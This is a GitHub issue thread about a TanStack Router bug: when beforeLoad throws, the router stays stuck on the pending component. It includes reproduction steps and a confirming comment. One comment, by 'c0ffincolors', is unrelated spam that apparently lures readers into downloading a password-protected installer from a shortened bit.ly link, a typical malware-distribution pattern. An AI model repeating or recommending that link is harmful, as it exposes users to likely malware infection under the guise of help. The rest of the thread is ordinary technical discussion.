### ISSUE TITLE
Router is stuck in displaying the loading component when an error is thrown from `beforeLoad`

### ISSUE THREAD

**Issue by cristi-lng** [TanStack/router#2198]
### Describe the bug

When an error is thrown from the `beforeLoad` option of a route and the router is configured with pending component, it seems that the router remains stuck in displaying the pending component.

If I remove the pending component it doesn't display anything.

### Your Example Website or App

https://stackblitz.com/edit/tanstack-router-g8hajv?file=src%2Fmain.tsx

### Steps to Reproduce the Bug or Issue

1. Check the demo from the link
2. See how the pending component is displayed indefinitely
3. You can toggle the defaultPendingComponent to test without the pending mode

### Expected behavior

I was expecting to see the error component in both cases: with and without the pending component.

### Platform

- OS: macOS
- Browser: Chrome
- @tanstack/react-router: 1.51.0

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Wassim24** [comment]
Hello, I'm experiencing the same issue.

When using the tanstack devtools, if resolve the promise manually in `scripts.loadPromise`, it shows the error component. Also, in the status, it is in `pending`.
